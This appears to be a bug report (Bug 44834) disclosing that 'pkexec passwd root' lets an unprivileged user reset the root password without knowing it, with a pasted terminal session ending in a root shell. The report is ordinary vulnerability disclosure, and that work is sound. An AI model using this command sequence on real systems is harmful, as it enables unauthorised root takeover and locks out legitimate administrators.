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Bug 44834
pkexec privilege escalation / changing root password without knowing it
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Copypaste of terminal
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>[phobeus@host-131 ~]$ su >Password: >su: Authentication failure >[phobeus@host-131 ~]$ pkexec passwd root >passwd: updating all authentication tokens for user root. > >You can now choose the new password or passphrase. > >A valid password should be a mix of upper and lower case letters, digits, and >other characters. You can use a password containing at least 4 characters >from at least 3 of these 4 classes. >An upper case letter that begins the password and a digit that ends it do not >count towards the number of character classes used. > >A passphrase should be of at least 3 words, 6 to 72 characters long, and >contain enough different characters. > >Alternatively, if no one else can see your terminal now, you can pick this as >your password: "shiny=blot!stack". > >Enter new password: >Re-type new password: >passwd: all authentication tokens updated successfully. >[phobeus@host-131 ~]$ su >Password: >[root@host-131 ~]#
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